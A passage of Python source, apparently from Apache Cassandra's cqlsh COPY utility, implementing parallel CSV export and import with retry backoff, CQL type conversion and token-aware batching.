def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
Must be declared in the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings, except that the converters for some types
# will fail to convert an empty string, in this case the null value should be inserted
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
# do not handle else case, if a statement could not be created, the exception is handled
# in self.wrap_make_statement and the error is reported, if a failure is injected that
# causes the statement to be None, then we should not report the error so that we can test
# the parent process handling missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
